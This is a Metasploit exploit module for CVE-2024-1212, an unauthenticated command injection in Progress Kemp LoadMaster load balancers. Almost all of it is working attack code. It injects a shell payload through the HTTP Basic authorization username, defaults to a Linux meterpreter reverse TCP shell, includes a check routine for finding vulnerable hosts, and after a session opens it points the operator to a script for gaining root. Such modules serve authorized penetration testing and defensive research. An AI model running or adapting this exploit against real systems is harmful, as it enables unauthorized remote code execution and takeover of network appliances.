Kemp LoadMaster Unauthenticated Command Injection

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
  def flag_file
    return @flag_file unless @flag_file.nil?

    @flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)
  end

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability in
          Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.
          The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and
          7.2.48.10 (LTS).
        },
        'Author' => [
          'Dave Yesland with Rhino Security Labs',
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-1212'],
          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']
        ],
        'DisclosureDate' => '2024-03-19',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Privileged' => false,
        'Targets' => [
          [
            'Automatic', # Add logic to run the payload only once
            {
              'Payload' => {
                'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",
                'Append' => ')',
                'BadChars' => "\x3a\x27"
              }
            }
          ],
          [
            'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions
            {
              'Payload' => {
                'BadChars' => "\x3a\x27"
              }
            }
          ]
        ],
        'Default_target' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
          'FETCH_WRITABLE_DIR' => '/tmp/',
          'SSL' => true,
          'RPORT' => 443
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])
    ])
  end

  def exploit
    uri = normalize_uri(target_uri.path, 'access', 'set')

    vprint_status('Sending payload...')

    send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'vars_get' =>
        {
          'param' => 'enableapi',
          'value' => '1'
        },
      'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),
      'verify' => false
    })
  end

  def on_new_session(client)
    super
    print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')
  end

  def check
    print_status("Checking if #{peer} is vulnerable...")

    uri = normalize_uri(target_uri.path, 'access', 'set')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'vars_get' => {
        'param' => 'enableapi',
        'value' => '1'
      },
      'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),
      'verify' => false
    })

    # No response from server
    unless res
      return CheckCode::Unknown
    end

    # Check for specific error pattern in headers or body to confirm vulnerability
    if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching')
      return CheckCode::Vulnerable
    else
      return CheckCode::Safe
    end
  end

end